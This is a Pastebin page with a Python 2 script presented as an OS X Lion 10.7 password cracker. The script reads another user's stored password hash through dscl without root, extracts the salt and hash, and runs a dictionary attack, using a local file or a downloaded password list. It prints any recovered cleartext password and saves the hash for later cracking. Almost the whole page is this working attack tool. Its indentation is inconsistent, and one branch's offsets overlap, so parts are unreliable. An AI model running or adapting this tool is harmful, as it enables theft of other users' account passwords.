API tools faq
paste
Advertisement
defenceindepth

OS X Lion Password Cracker

defenceindepth
Sep 18th, 2011
37,468
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.89 KB | None | 0 0
raw download clone embed print report
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  21. link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  22. defaultuser = False
  23. username = ""
  24.  
  25. def check(password): # Hash password and compare
  26.        
  27.     if not password.startswith("#!"): # Ignore comments
  28.  
  29.         guess = hashlib.sha512(salt_hex + password).hexdigest()
  30.         print("Trying... " + password)
  31.    
  32.         if guess == hash:
  33.             print("Cleartext password for user '"+username+"' is : "+password)
  34.             exit(0)
  35.  
  36. if len(sys.argv) < 2:
  37.     print("No username given. Defaulting to current user.")
  38.     defaultuser = True
  39. else:
  40.     username = sys.argv[1]
  41.  
  42. p = Popen("whoami", shell=True, stdout=PIPE)
  43. whoami = p.communicate()[0]
  44.  
  45. if defaultuser:
  46.     username = whoami.rstrip()
  47.  
  48. p = Popen("dscl localhost -read /Search/Users/" + username, shell=True, stdout=PIPE)
  49. dscl_out = p.communicate()[0]
  50.  
  51. list = dscl_out.split("\n")
  52.  
  53. for pos,item in enumerate(list): # extract digest
  54.     if "dsAttrTypeNative:ShadowHashData" in item:
  55.         digest = list[pos+1].replace(" ", "")
  56.  
  57. if len(digest) == 262: # Out of box configuration  
  58.     salt = digest[56:64]   
  59.     hash = digest[64:192]
  60. elif len(digest) == 314: # SMB turned on
  61.     print("SMB is on")
  62.     salt = digest[104:112]
  63.     hash = digest[112:240]
  64. elif len(digest) == 1436: # Lion Server
  65.     salt = digest[176:184]
  66.     hash = digest[176:304]
  67. elif len(digest) == 1492: # Lion Server with SMB
  68.     salt = digest[224:232]
  69.     hash = digest[232:360]
  70.  
  71. print("SALT : " + salt)
  72. print("HASH : " + hash)
  73.  
  74. salt_hex =  chr(int(salt[0:2], 16)) + chr(int(salt[2:4], 16)) + chr(int(salt[4:6], 16)) + chr(int(salt[6:8], 16))
  75.  
  76. if len(sys.argv) == 3: # If dictionary file specified
  77.         print("Reading from dictionary file '"+sys.argv[2]+"'.")
  78.         check(whoami.rstrip())
  79.     passlist = open(sys.argv[2], "r")
  80.         password = passlist.readline()
  81.  
  82.         while password:
  83.                 check(password.rstrip())
  84.                 password = passlist.readline()
  85.         passlist.close()
  86.  
  87. else: # No dictionary file specified
  88.         print("No dictionary file specified. Defaulting to hard coded link.")
  89.        
  90.     passlist = urllib2.urlopen(link) # Download dictionary file
  91.         passwords = passlist.read().split("\n")
  92.     print("\nPassword list successfully read")
  93.    
  94.     passwords.append(whoami.rstrip())  
  95.    
  96.     print("\nCracking...")
  97.         for password in passwords:
  98.                 check(password)
  99.  
  100. # Save hash for later
  101. print("\nSaving hash to "+username+".hash...")
  102. out = open(username+".hash", "w")
  103. out.write(salt+hash)
  104. out.close()
  105.  
  106. print("\nPassword not found. Try another dictionary.\n")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy